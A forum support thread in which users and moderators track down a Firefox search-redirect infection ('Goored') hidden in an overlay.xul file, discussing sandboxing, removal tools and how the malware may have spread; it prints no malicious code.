RESOLVED Strange script tries to run when connection is down

[computerfreaker]

Okay, I'll admit that I am stupid for not knowing that Windows XP will not search for content inside of a .xul file, I am sure there are plenty of other extensions that are excluded as well.

If I had know that, I would have looked for a program that would search the content of ALL files. Sorry about that guys. This would have been found a long time ago.

The overlay.xul file contains all of the information that we were looking for... google.com, yahoo.com, ask.com, etc.

Man, do I feel dumb.

D'oh, am I ever an idiot.
I was searching through some VB projects a few days ago, and Windows Search completely ignored all the .vbp, .frm, .bas, etc. files - I should have known it would ignore .xul's as well...

Well, I guess this is a lesson for the future... and Tom, you might want to search your own computer sooner rather than later.

@Montagar, could you upload those files & post the link here? I'm very interested in analyzing this... (and maybe we can track it back to its source, although I doubt the malware creators would be that stupid)

[Tom T.]

Man, do I feel dumb.

*Don't.*

It took most of the Support Team, the Admin, and a determined, knowledgeable, and highly-motivated user, about three weeks to track down and eliminate the bazillion possibllities before locating this. (And now we're *all* smarter, in case such an issue should arise again.)

Clearly, I had a one-time infection that was destroyed as soon as the sandbox was emptied -- which is *exactly* why I consider SB vital, not just for general safety, but for doing support here, where we're asked to go to strange sites, disable NS, etc. That disappearance was another confusing factor, and prevented me from investigating it *directly*. Didn't know where it came from, so couldn't try to "get infected* again. Your post of the contents should help track down the source.

Disclaimer: There are many virtualization and sandboxing solutions available. I mention Sandboxie because it's the one I use and am most familiar with. Sandboxie is not endorsed nor supported by this forum, NoScript, FlashGot, Giorgio Maone, Informaction, or any other person or entity here. Support is the responsibility of the developer of that tool. Investigate available solutions before deciding on your own, rather than relying on my (or anyone else's) personal experience or opinion.

Having said that, I feel that *some* type of sandboxing or virtualization tool is a vital addition to overall "defense in depth". (as this case so dramatically proved. )

@ computerfreaker: Would you like a job here? Rewards: Long hours, no pay, occasional flames from disgruntled users ....

Seriously: Well done.

Let's all thank computerfreaker for his unending persistence in the face of multiple blind alleys and dead ends.

Edit: Oops, missed that one line,

CF: "Tom, you might want to search your own computer sooner rather than later."

I'd already done all of the searches, including the one that was eventually successful for Montagar, and I'm about 100% certain that Sandboxie dumped the badware. (another reason I empty it *very* frequently -- often, between each site visit). Inability to reproduce confirms this.

I do wish that I'd documented each open/close of the browser, machine reboot, etc., but I foolishly assumed that if I could reproduce it today, I could reproduce it tomorrow. I *will* take the "Sandboxie effect" into consideration in the future -- thanks for indirectly bringing up that point.

Or *everyone* could get some kind of virtualization tool (should be standard with all OS and browsers ), and a lot of these attacks would become non-issues.

But*why* did only two users in the entire NS community notice this???? .... still like to find the source, if possible.

[computerfreaker]

Man, do I feel dumb.

*Don't.*

It took most of the Support Team, the Admin, and a determined, knowledgeable, and highly-motivated user, about three weeks to track down and eliminate the bazillion possibllities before locating this. (And now we're *all* smarter, in case such an issue should arise again.)

yes, this one gave us all a run for our money... definitely something to file in memory for possible future use, in case such a thing ever happens again. (Hope it doesn't, but the best offense is a good defense, so...)

Clearly, I had a one-time infection that was destroyed as soon as the sandbox was emptied -- which is *exactly* why I consider SB vital, not just for general safety, but for doing support here, where we're asked to go to strange sites, disable NS, etc. That disappearance was another confusing factor, and prevented me from investigating it *directly*. Didn't know where it came from, so couldn't try to "get infected* again. Your post of the contents should help track down the source.

yes, Monty (you don't mind if I call you that, do you? ), your post of the contents will be a pretty important thing to have. I have to confess, I'm eager to see the beast that's been tormenting us for three weeks or so...

Disclaimer: There are many virtualization and sandboxing solutions available. I mention Sandboxie because it's the one I use and am most familiar with. Sandboxie is not endorsed nor supported by this forum, NoScript, FlashGot, Giorgio Maone, Informaction, or any other person or entity here. Support is the responsibility of the developer of that tool. Investigate available solutions before deciding on your own, rather than relying on my (or anyone else's) personal experience or opinion.

I also use Sandboxie on occasion; looks like I'd better start using it more.
Disclaimer: I'm not endorsing anything either.

Having said that, I feel that *some* type of sandboxing or virtualization tool is a vital addition to overall "defense in depth". (as this case so dramatically proved. )

yes, an extra line of defense like that is huge. I'd say it saved your machine from that innoshot thing, and it would have saved Montagar as well. Fortunately, NS & his vigilance kept it down until we could take it out.

@ computerfreaker: Would you like a job here? Rewards: Long hours, no pay, occasional flames from disgruntled users ....

It would be a great honor.

Seriously: Well done.

Let's all thank computerfreaker for his unending persistence in the face of multiple blind alleys and dead ends.

Thank you so much, Tom! I'd also like to thank both you and Montagar for your persistence in trying just about every wacky idea we came up with, and especially Montagar for not hosing his drive, even when things looked really bad...
(Side note: hey, it really is darkest just before the dawn! )

Edit: Oops, missed that one line,

CF: "Tom, you might want to search your own computer sooner rather than later."

I'd already done all of the searches, including the one that was eventually successful for Montagar, and I'm about 100% certain that Sandboxie dumped the badware. (another reason I empty it *very* frequently -- often, between each site visit). Inability to reproduce confirms this.

Good. I wasn't sure, since the malware was an addon, if your enabling/disabling temporarily took out the addon or if closing the sandbox took care of it for good. Good riddance...
Now I have to wonder how the thing managed to survive one browser restart - addons can't be installed w/o a browser restart, and the sandbox took care of it so... I'd love to know just what went on inside your computer that the malware survived one restart but not two. (Although maybe you just restarted your browser, not the entire sandbox? That's possible...)

I do wish that I'd documented each open/close of the browser, machine reboot, etc., but I foolishly assumed that if I could reproduce it today, I could reproduce it tomorrow. I *will* take the "Sandboxie effect" into consideration in the future -- thanks for indirectly bringing up that point.

Well, IMHO something like VMWare or VirtualBox could be useful in cases like this - by locking down the VM, infection would be kept inside it but could be readily examined. (With no fear of the infection vanishing the next day unless you deleted the VM)

Or *everyone* could get some kind of virtualization tool (should be standard with all OS and browsers ), and a lot of these attacks would become non-issues.

True. Although it's probably just as well that Montagar didn't have a sandbox in place, as this circus could save other users with similar issues (and no sandbox)...

But*why* did only two users in the entire NS community notice this???? .... still like to find the source, if possible.

No idea. Given the fact that it came via an addon, and neither of you noticed the "do you want to install this addon" dialog, I'd guess it piggybacked on a legit addon or install.

Don't want to sound nosy or anything, but could the two of you post your Fx addon list (including version #'s) and your application list? A simple comparison should eliminate most of the possibilities... and, given that both infections came recently (I can tell about Monty's from the file dates, and yours from the sandbox), it shouldn't be hard to track down. (The malware source code should really help, too)

Cheers!!

[Tom T.]

I also use Sandboxie on occasion; looks like I'd better start using it more.

How 'bout "100% of the time"? Only exceptions: Firefox updates from Mozilla. (Need an admin-privileged browser.)

Only downsides: If you d/l a video, pic, sound clip, etc., there's an extra step or two to move it from the sandbox to your "real" machine. If you forget, you *could* lose it, but well-behaved SB looks for the types of files that you might want to save, and prompts you to recover them (or not), before it will close and empty.

The manual move of mysong.mp3 from sandbox to HD is easy. When I click "Save as... " etc., I get an immediate prompt from SB, "Would you like to recover the following file?" "Yes, to same folder" .. "Yes, to a different folder" "Not right now".

Tip: I have my mouse pointer configured so that the pointer automatically jumps to any highlighted dialogue button. So one left-click, and it's *done*. I don't know if all mouse drivers support this. (This is a laptop, where the touchpad isn't as fast to use as a physical mouse is.)

You can get some xpi updates in this fashion (manual move, then later drop into an Admin browser).

@ computerfreaker: Would you like a job here? Rewards: Long hours, no pay, occasional flames from disgruntled users ....

It would be a great honor.

Consider the statement a great honor. But it's not my place to choose Mods. (also will PM you with some additional considerations.) Slightly facetious, but indeed a compliment to your tireless detective work.

Edit: Oops, missed that one line,

CF: "Tom, you might want to search your own computer sooner rather than later."

I'd already done all of the searches, including the one that was eventually successful for Montagar, and I'm about 100% certain that Sandboxie dumped the badware. (another reason I empty it *very* frequently -- often, between each site visit). Inability to reproduce confirms this.

Good. I wasn't sure, since the malware was an addon, if your enabling/disabling temporarily took out the addon or if closing the sandbox took care of it for good. Good riddance...
Now I have to wonder how the thing managed to survive one browser restart - addons can't be installed w/o a browser restart, and the sandbox took care of it so... I'd love to know just what went on inside your computer that the malware survived one restart but not two. (Although maybe you just restarted your browser, not the entire sandbox? That's possible...)

The last statement isn't possible. I have SB configured to the safest setting, which is to automatically empty the sandbox whenever the sandboxed app (the browser, in this case) is closed.

So there are two possibilities: 1) A legitimate, but infected update was obtained with a non-SB'd browser, and restarted as required, in which case the malcode *is* part of the update that is written to the HD. Then, SB would clone the infected extension every time. BUT that would *not* have extinguished the malcode, as we apparently saw SB do. I would still be able to reproduce it as ol' Monty did. So let's rule that out.

2) What I had said earlier: That I picked up the infection in the same browsing session, perhaps as part of some rogue code running on Google (I have all of the ads and ad scripts blocked), and never did close the session on that "interesting" day. Perhaps when I did the test of disabling the extensions, which *does* require restarting an admin-priv browser, it wasn't the disabling that eliminated it, it was the closing of SB to do the disable/restart that dumped the just-acquired malcode.

The more I think about it, the more #2 seems to be the only possibility.

In the future, when I can reproduce an error that may be infection-related, I'll examine the contents of the sandbox *while it is still open*, and log the closing/reopening in relation to the issue. In my sole defense , most of the malfunction issues are either a bug in NS, a flaw in site coding, configuration errors, etc. IIRC, this is the first apparently-infectious agent that I can remember dealing with in my time here.

Well, IMHO something like VMWare or VirtualBox could be useful in cases like this - by locking down the VM, infection would be kept inside it but could be readily examined. (With no fear of the infection vanishing the next day unless you deleted the VM)

Definitely. Or I could have inspected the contents in real time, as mentioned. Or copied them to a permanent folder on my machine, and *opened its files sandboxed only*, at leisure, to examine the contents. Yes, you can open just about any app or file inside SB. (Uh-oh, sounds like I'm touting it again. Just thinking of ways I could have used it to examine this sucker even after it was extinguished from the virtual browser.)

VMWare is much more expensive than SB (which is available for free if you can stand the nag screens), and requires more disk space, memory, etc. Definitely a good thing for the tech-savvy, developers, etc. SB (and some others) are light in weight and require only a very short learning curve, after which there aren't any decisions to make -- probably more friendly for the average home user. I know that devs like Guardian and Giorgio Maone use the more sophisticated ones so that they can easily have multiple OSs on one machine, test sw, patches, etc.

Or *everyone* could get some kind of virtualization tool (should be standard with all OS and browsers ), and a lot of these attacks would become non-issues.

True. Although it's probably just as well that Montagar didn't have a sandbox in place, as this circus could save other users with similar issues (and no sandbox)...

And no NoScript -- I wonder how many users of other browsers, or of Fx without NS, got this infection, and *what actual damage it did*? ... And why has it not made a splash in the security community? Seems like it didn't penetrate very far...

Don't want to sound nosy or anything, but could the two of you post your Fx addon list (including version #'s) and your application list? A simple comparison should eliminate most of the possibilities... and, given that both infections came recently (I can tell about Monty's from the file dates, and yours from the sandbox), it shouldn't be hard to track down. (The malware source code should really help, too)

Being naturally lazy , how 'bout if we look at the source code first, which *might* be a dead give-away. If not, then we can take other steps.

[Montagar]

Okay... what method should I use to post the overlay.xul code? (Post it here using the code tags, use pastebin.com, etc)

[Tom T.]

Okay... what method should I use to post the overlay.xul code? (Post it here using the code tags, use pastebin.com, etc)

How large is it? The XUL files I have are only a dozen lines or so, so posting here using code tags would be easiest for all concerned.

But if this malicious file is very large (runs into a two-page post, lol), exterior hosting with a link is better. If you'd rather not use an outside host, I have plenty of free space available on my own site. You could email me the file, first changing the extension to .txt to avoid tripping filters. But it's probably not much larger than the legit ones.

[Firefoxer]

Hello Montagar, HijackThis is a deprecated malware removal tool mostly among the malware removal community now, did you know?
The source of this variant of goored (it's been around since early last year) may still be on your hdd, despite the goored behaviour having been stopped for you just now.
In the Firefox forums, in a thread dealing with one of these vundo aka goored aka clickfeedmanager etc. variants, Daifne, a moderator, wrote:

Install and run these programs.
Malwarebytes' Anti-Malware
SuperAntispyware
AdAware
Spybot Search & Destroy

If these don't find it or can't clear it, post in one of these forums for specialized malware removal help:
http://www.spywarewarrior.com/index.php
http://forum.aumha.org/
http://www.spywareinfoforum.com/

and that's the best course of action for geeks and non-geeks alike when these kinds of infections arise.
Malwarebytes' Anti-Malware (MBAM) is at the bleeding edge for finding malware right now, so it's the tool most likely to find evidence of the newest kinds of vundos.
I also wonder whether you are keeping right up-to-date with your Java (use the Control Panel) versions, and at the same time removing all old versions if you don't have specific apps that use them.

With any luck, you are already free of any underlying malware, but I want to add that you please consider taking your findings to the forums which specialise in malware hunting anyway. This is because if your finding is a new variant, then your data won't be dangling around in a little-known forum (to the malware searcher's community, not to us in the Firefox community, of course ), it can be used to update the current very effective goored removal tool that will help the non-tech needy, and if your variant is already known, then you *may*, judging by the reported steps you've taken, still need help to be perfectly certain that you've found the original vundo infection source.
Good luck

[GµårÐïåñ]

@ Guardian: Is it possible that a "legitimate" extension was corrupted to contain the rogue script? Should we check checksums on those extension folders? (Since I can't reproduce it, I doubt I'd find anything.)

Absolutely, that's why I said exploiting an extensions vulnerability, not unlike the ABP issue that was recently brought to light, around the same time the developer basically said I don't have time Basically someone could have analyzed a code for an extension and found a way to inject into or use it to run their own code, absolutely. HOWEVER, that being said, it will masquerade and install as "SOMETHING", what that is depends but it WILL be visible in the addons and you know you didn't put it there, you remove it. Unfortunately it pains me to bring it up, but as recent as the ABP/NS issue, you remember it was system level injection that became the problem, so yes it can be done, but again it will still show up.

[Montagar]

Well before I post the source code there are a few things that I need to get cleared up first.

I have looked at the code and done some research and it appears that this code belongs to a valid FF add-on (it's listed at addons.mozzila.org).

I know for a fact that I have never installed this particular add-on (well at least not knowingly), and it was never listed in my extensions or plugins list.

So before I post the code, I am going to do some research like comparing the "valid" add-on with the "rogue" add-on.

I hope you all understand that I don't want to open the door for accusations and such without doing some prudent research first.

[computerfreaker]

I also use Sandboxie on occasion; looks like I'd better start using it more.

How 'bout "100% of the time"? Only exceptions: Firefox updates from Mozilla. (Need an admin-privileged browser.)

100% sounds good to me - since I use Fx Portable, I don't want automatic updates (they break any Fx local installs, last I heard). 100% is good...

Only downsides: If you d/l a video, pic, sound clip, etc., there's an extra step or two to move it from the sandbox to your "real" machine. If you forget, you *could* lose it, but well-behaved SB looks for the types of files that you might want to save, and prompts you to recover them (or not), before it will close and empty.

Cool. With d/l'ing, I'd have to be careful, though, as my dialup connection isn't the sort of thing to make that kind of mistake with... especially with a big, 101-MB OOo install, eh?

The manual move of mysong.mp3 from sandbox to HD is easy. When I click "Save as... " etc., I get an immediate prompt from SB, "Would you like to recover the following file?" "Yes, to same folder" .. "Yes, to a different folder" "Not right now".

Sounds easy... and my own (admittedly limited) experience with SandBoxie confirms the ease-of-use.

Tip: I have my mouse pointer configured so that the pointer automatically jumps to any highlighted dialogue button. So one left-click, and it's *done*. I don't know if all mouse drivers support this. (This is a laptop, where the touchpad isn't as fast to use as a physical mouse is.)

My touchpad supports that, but I won't be doing it anytime soon - I tend to click pretty quickly, and any auto-moving could result in my clicking something I don't want to. I've already turned that off...

You can get some xpi updates in this fashion (manual move, then later drop into an Admin browser).

Oh, that's right, I'd have to run addon updates in a non-sandboxed browser... oh well, not a big deal.

@ computerfreaker: Would you like a job here? Rewards: Long hours, no pay, occasional flames from disgruntled users ....

It would be a great honor.

Consider the statement a great honor. But it's not my place to choose Mods. (also will PM you with some additional considerations.) Slightly facetious, but indeed a compliment to your tireless detective work.

Your statement is a very great honor to me; this is definitely one for Scrapbook to save.
I understand you can't choose mods, and your additional considerations are very valid as well; however, just the statement is a huge reward. I value everything you guys have to say, and (especially from a mod) that statement means a great deal to me...

Edit: Oops, missed that one line,

CF: "Tom, you might want to search your own computer sooner rather than later."

I'd already done all of the searches, including the one that was eventually successful for Montagar, and I'm about 100% certain that Sandboxie dumped the badware. (another reason I empty it *very* frequently -- often, between each site visit). Inability to reproduce confirms this.

Good. I wasn't sure, since the malware was an addon, if your enabling/disabling temporarily took out the addon or if closing the sandbox took care of it for good. Good riddance...
Now I have to wonder how the thing managed to survive one browser restart - addons can't be installed w/o a browser restart, and the sandbox took care of it so... I'd love to know just what went on inside your computer that the malware survived one restart but not two. (Although maybe you just restarted your browser, not the entire sandbox? That's possible...)

The last statement isn't possible. I have SB configured to the safest setting, which is to automatically empty the sandbox whenever the sandboxed app (the browser, in this case) is closed.

So there are two possibilities: 1) A legitimate, but infected update was obtained with a non-SB'd browser, and restarted as required, in which case the malcode *is* part of the update that is written to the HD. Then, SB would clone the infected extension every time. BUT that would *not* have extinguished the malcode, as we apparently saw SB do. I would still be able to reproduce it as ol' Monty did. So let's rule that out.

2) What I had said earlier: That I picked up the infection in the same browsing session, perhaps as part of some rogue code running on Google (I have all of the ads and ad scripts blocked), and never did close the session on that "interesting" day. Perhaps when I did the test of disabling the extensions, which *does* require restarting an admin-priv browser, it wasn't the disabling that eliminated it, it was the closing of SB to do the disable/restart that dumped the just-acquired malcode.

The more I think about it, the more #2 seems to be the only possibility.

#2 has one problem though - you'd have to restart the browser to install the addon! So how this thing survived on browser/sandbox restart (to install), but not a second restart, is a mystery that probably only the source code can clear up.

Well, IMHO something like VMWare or VirtualBox could be useful in cases like this - by locking down the VM, infection would be kept inside it but could be readily examined. (With no fear of the infection vanishing the next day unless you deleted the VM)

Definitely. Or I could have inspected the contents in real time, as mentioned. Or copied them to a permanent folder on my machine, and *opened its files sandboxed only*, at leisure, to examine the contents. Yes, you can open just about any app or file inside SB. (Uh-oh, sounds like I'm touting it again. Just thinking of ways I could have used it to examine this sucker even after it was extinguished from the virtual browser.)

If Montagar ever posts the source (see his comment below), I'll be opening it in a sandbox only - I don't feel like turning it loose on my system, thanks anyway.

VMWare is much more expensive than SB (which is available for free if you can stand the nag screens), and requires more disk space, memory, etc. Definitely a good thing for the tech-savvy, developers, etc. SB (and some others) are light in weight and require only a very short learning curve, after which there aren't any decisions to make -- probably more friendly for the average home user. I know that devs like Guardian and Giorgio Maone use the more sophisticated ones so that they can easily have multiple OSs on one machine, test sw, patches, etc.

I was thinking more of VMWare Server or VMWare Player, both of which are free... (I know, because I've used both before)
VirtualBox is also free, but a little less advanced AFAICT. (I've used VirtualBox as well, but ditched it in favor of VMWare)

Or *everyone* could get some kind of virtualization tool (should be standard with all OS and browsers ), and a lot of these attacks would become non-issues.

True. Although it's probably just as well that Montagar didn't have a sandbox in place, as this circus could save other users with similar issues (and no sandbox)...

And no NoScript -- I wonder how many users of other browsers, or of Fx without NS, got this infection, and *what actual damage it did*? ... And why has it not made a splash in the security community? Seems like it didn't penetrate very far...

Definitely weird that we haven't heard more about this. Given the number of NS users, you'd think somebody would notice...

Don't want to sound nosy or anything, but could the two of you post your Fx addon list (including version #'s) and your application list? A simple comparison should eliminate most of the possibilities... and, given that both infections came recently (I can tell about Monty's from the file dates, and yours from the sandbox), it shouldn't be hard to track down. (The malware source code should really help, too)

Being naturally lazy , how 'bout if we look at the source code first, which *might* be a dead give-away. If not, then we can take other steps.

Sure, let's see the source first.
Only thing is, if this is well-designed it won't leave any calling cards at all...

Hello Montagar, HijackThis is a deprecated malware removal tool mostly among the malware removal community now, did you know?

Depreciated? HJT? Wow.
It's still a pretty potent tool, AFAICT... and, like most depreciated things, I doubt it's going anywhere soon. That's just MHO, though.

The source of this variant of goored (it's been around since early last year) may still be on your hdd, despite the goored behaviour having been stopped for you just now.
In the Firefox forums, in a thread dealing with one of these vundo aka goored aka clickfeedmanager etc. variants, Daifne, a moderator, wrote:

Install and run these programs.
Malwarebytes' Anti-Malware
SuperAntispyware
AdAware
Spybot Search & Destroy

If these don't find it or can't clear it, post in one of these forums for specialized malware removal help:
http://www.spywarewarrior.com/index.php
http://forum.aumha.org/
http://www.spywareinfoforum.com/

and that's the best course of action for geeks and non-geeks alike when these kinds of infections arise.

True, but we weren't totally sure this was an infection - and even now, we're not sure, pending evidence from Montagar.

Malwarebytes' Anti-Malware (MBAM) is at the bleeding edge for finding malware right now, so it's the tool most likely to find evidence of the newest kinds of vundos.

True. But I thought you ran MBAM, Monty? Or am I thinking of something else?

With any luck, you are already free of any underlying malware, but I want to add that you please consider taking your findings to the forums which specialise in malware hunting anyway. This is because if your finding is a new variant, then your data won't be dangling around in a little-known forum (to the malware searcher's community, not to us in the Firefox community, of course ), it can be used to update the current very effective goored removal tool that will help the non-tech needy, and if your variant is already known, then you *may*, judging by the reported steps you've taken, still need help to be perfectly certain that you've found the original vundo infection source.

Sound advice, IMHO.

Okay... what method should I use to post the overlay.xul code? (Post it here using the code tags, use pastebin.com, etc)

If you decide to post it, any public upload site should be OK... just make sure you label it in such a fashion that nobody doubts it's malware (i.e. "Innoshots malware.zip" would be great), so nobody stumbles into it and gets infected by mistake. Also, make sure you change the link protocol so nobody accidentally clicks it, pre-loads it (addons like Fasterfox preload links, IIRC), etc...

Basically someone could have analyzed a code for an extension and found a way to inject into or use it to run their own code, absolutely. HOWEVER, that being said, it will masquerade and install as "SOMETHING", what that is depends but it WILL be visible in the addons and you know you didn't put it there, you remove it.

So are you saying nothing can hide from the addons list, just piggyback on a legitimate addon? Because it sounds like these goored infections are all hiding from the addons list, but it also sounds like you're saying nothing can hide from the list... I'd like to resolve that discrepancy, primarily just for the knowledge.

Well before I post the source code there are a few things that I need to get cleared up first.

I have looked at the code and done some research and it appears that this code belongs to a valid FF add-on (it's listed at addons.mozzila.org).

I know for a fact that I have never installed this particular add-on (well at least not knowingly), and it was never listed in my extensions or plugins list.

So before I post the code, I am going to do some research like comparing the "valid" add-on with the "rogue" add-on.

I hope you all understand that I don't want to open the door for accusations and such without doing some prudent research first.

Well, I'll be danged. I'd love to know just what's going on here... has a valid addon been hacked, a malicious addon put out as a valid addon, or what the heck?
Monty, would you be willing to PM the details of this? I'd be happy to see the details, and I'm sure Tom, Guardian, Alan and possibly even Mr. Maone might want to see as well... (listing people who've been active in the thread, although you might want to be sure they're OK with you PM'ing the details)
As always, everything you send will be in strict confidence...

-computerfreaker

[computerfreaker]

The "fun" never stops, does it?
You guys had better check this out: http://forums.mozillazine.org/viewtopic ... b&start=30

Here's the relevant post:

There are dlls that are install by some add on to firefox. You will be reinfected when you reboot unless you get rid of them. Do goorfix.exe first to stop the behavior. Look in your msconfig list of startup items and you will see two that are randomly named (long names lot of characters). Get rid of those two or it will come back.

People are also reporting having the same issue in IE... apparently this goored infection has been around for a LONG time (January '09), and you guys just got a new variant.

btw, make sure your .NET Framework addon is disabled/uninstalled and the Windows Presentation Foundation plugin is disabled - those provide a nice attack vector goored's been using to spread. This is a classic drive-by download... thanks, MS.

[Tom T.]

...You can get some xpi updates in this fashion (manual move, then later drop into an Admin browser).

Oh, that's right, I'd have to run addon updates in a non-sandboxed browser... oh well, not a big deal.

Sorry if I wasn't clear again. What I was trying to say is that you can get the .xpi with your sandboxed browser, recover the xpi from the sandbox, then drop it in a non-SB broswer *with the Internet connection off". If the xpi itself is corrupted, you're still hosed. But it just minimizes the number of times that you have to expose a non-SB browser to the world, that's all. (Then re-start the non-SB, close it, turn the Net back on, and start your SB browser.) I wasn't saying that it would prevent a corrupt add-on from affecting you. Just that there are very few occasions that you *must* run non-SB live on the Net.

#2 has one problem though - you'd have to restart the browser to install the addon! So how this thing survived on browser/sandbox restart (to install), but not a second restart, is a mystery that probably only the source code can clear up.

See above. You must restart a *non-SB* browser, so that the new files can be written to the profile on the HD. The malcode gets written as well. *But* ... then it wouldn't have been extinguished by SB, which is why I said,

That I picked up the infection in the same browsing session, perhaps as part of some rogue code running on Google

This is why I asked Guardian if a legit extension could be corrupted, and as you see, he said someone could find a way to inject their code into a legit extension (not an update, IIUC). The only thing puzzling me here is his statement that it would be visible in the add-ons, which neither Monty nor I saw, so I'm awaiting the same response Monty is to that question. Myself, I don't see why it couldn't just run from within the corrupted extension that arouses no suspicion in your add-ons list.

@ Guardian: Can you elaborate on that, please?

If Montagar ever posts the source (see his comment below), I'll be opening it in a sandbox only - I don't feel like turning it loose on my system, thanks anyway.

We don't need to open it. The XUL files can be posted here in text with code tags. E.g:

Code: Select all

<?xml version="1.0"?>

<!DOCTYPE overlay SYSTEM "chrome://javaconsole1.x.x_x/locale/ffjcext.dtd">
<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script type="application/x-javascript" src="chrome://javaconsole1.x.x_x/content/ffjcext.js"/>

<menupopup id="menu_ToolsPopup">  
		<menuitem 
		id="javaconsole1.x.x.x" 
		label="&javaConsoleCmd.label;" 
		accesskey="&javaConsoleCmd.accesskey;"
		insertafter="devToolsSeparator"/>
</menupopup>

	
</overlay>

Definitely weird that we haven't heard more about this. Given the number of NS users, you'd think somebody would notice...

According to Firefoxer, it's a variant of a year-old issue.

@ Firefoxer: How is this normally acquired or spread; where does it usually live, and *what does it do*? We know it tries to run a script from innoshot, but what does that script do?

I too thought that Montagar had run MBAM already, with no results.

...just make sure you label it in such a fashion that nobody doubts it's malware (i.e. "Innoshots malware.zip" would be great), so nobody stumbles into it and gets infected by mistake. Also, make sure you change the link protocol so nobody accidentally clicks it, pre-loads....

I wasn't thinking of posting it as a downloadable package. I got the impression from Monty's post above that all of the smoking-gun information was in overlay.xul, which is why I suggested that it be copied/pasted here in text form with code tags. If I got the wrong impression, I'm sorry -- then another solution would have to be found. But this way, we can examine it *without opening or running it". Including any .js files, which also can be copied as text in code tags.

I have looked at the code and done some research and it appears that this code belongs to a valid FF add-on (it's listed at addons.mozzila.org).

I know for a fact that I have never installed this particular add-on (well at least not knowingly), and it was never listed in my extensions or plugins list.

We still need to square that with Guardian's opinion, definitely.

So before I post the code, I am going to do some research like comparing the "valid" add-on with the "rogue" add-on.

I hope you all understand that I don't want to open the door for accusations and such without doing some prudent research first.

I can understand that. But I'm certainly willing to be PM'd with any info.

Easy search tip: If this thing *always* is packaged in overlay.xul, then just search the machine for all files named that, not for "innoshot". Or even *.xul. I have only a few of those.

[Tom T.]

Saw CF's latest post after posting my rather lengthy one above.

Look in your msconfig list of startup items and you will see two that are randomly named (long names lot of characters).

Not here, as we're pretty sure mine was dumped by SB. But I think that checking the Registry "run" keys, and using Autoruns, is even more thorough. Which I believe Monty did -- not sure if he ever gave a full report on Autoruns.

btw, make sure your .NET Framework addon is disabled/uninstalled and the Windows Presentation Foundation plugin is disabled -

I've *never* installed .NET on this machine -- thought it was a bad idea when it first came out and never had Win Infestation, either.

[computerfreaker]

The quote nesting is getting a little crazy, and I have a lot of fresh info, so I'm starting fresh.

@Tom, I partly understood what you were saying about updating addons /w/ Sandboxie running - thanks for the clarification.

Well, I'm about ready to get on a stump and summarize what I've learned from half-an-hour or so of searching for "Goored" and "Goored malware"... here we go. Note: I'm enclosing this in a quote block, but none of it is actually quoted - it's summarized from what I learned.

Both of you picked up a variant of the Goored (short for Google Redirect) infection. The typical Goored infection redirects the browser from search engine sites to adware/scumware sites - the redirected search sites include Google.com, Ask.com, Bing.com, etc. (Sound familiar, Montagar? Your page list is remarkably similar to this...)

Goored doesn't seem to try to steal any personal info, wreck any files, etc. - just redirect pages and sometimes change the HOSTS file. This is probably some black-hat hacker trying to earn extra money through some affiliate program by bringing extra traffic to certain sites.

It frequently infects Internet Explorer as well; removal doesn't seem to be too difficult, but some people have persistent trouble with it.
Goored (Firefox) lives (as Monty found) in a folder containing overlay.xul and some JavaScript files; the actual folder location seems to vary, depending on the infection variant. Goored (IE) lives in C:\Windows and C:\Windows\system32, where it installs several DLL's.
It's apparently possible to get re-infected after rebooting the computer; to prevent that, leave the Goored infection folder in place but remove the JavaScript files and overlay.xul. Then create a new, blank overlay.xul file using Notepad or another text editor (make sure extensions are shown in Windows explorer or you could end up with a file called "overlay.xul.txt", which is useless for stopping Goored) and place it in the location formerly occupied by the malicious overlay.xul file.

Goored seems to bypass most antivirus apps, including MalwareBytes AntiMalware on occasion. (More than just on occasion, as a LOT of people were saying they ran MBAM but it came up empty)
However, there is a tool just for removing Goored; its guide (including a download link) is located at http://forums.majorgeeks.com/showthread.php?t=182559

HTH!

[computerfreaker]

Saw CF's latest post after posting my rather lengthy one above.

Look in your msconfig list of startup items and you will see two that are randomly named (long names lot of characters).

Not here, as we're pretty sure mine was dumped by SB. But I think that checking the Registry "run" keys, and using Autoruns, is even more thorough. Which I believe Monty did -- not sure if he ever gave a full report on Autoruns.

btw, make sure your .NET Framework addon is disabled/uninstalled and the Windows Presentation Foundation plugin is disabled -

I've *never* installed .NET on this machine -- thought it was a bad idea when it first came out and never had Win Infestation, either.

Good. Hope Monty's OK as well...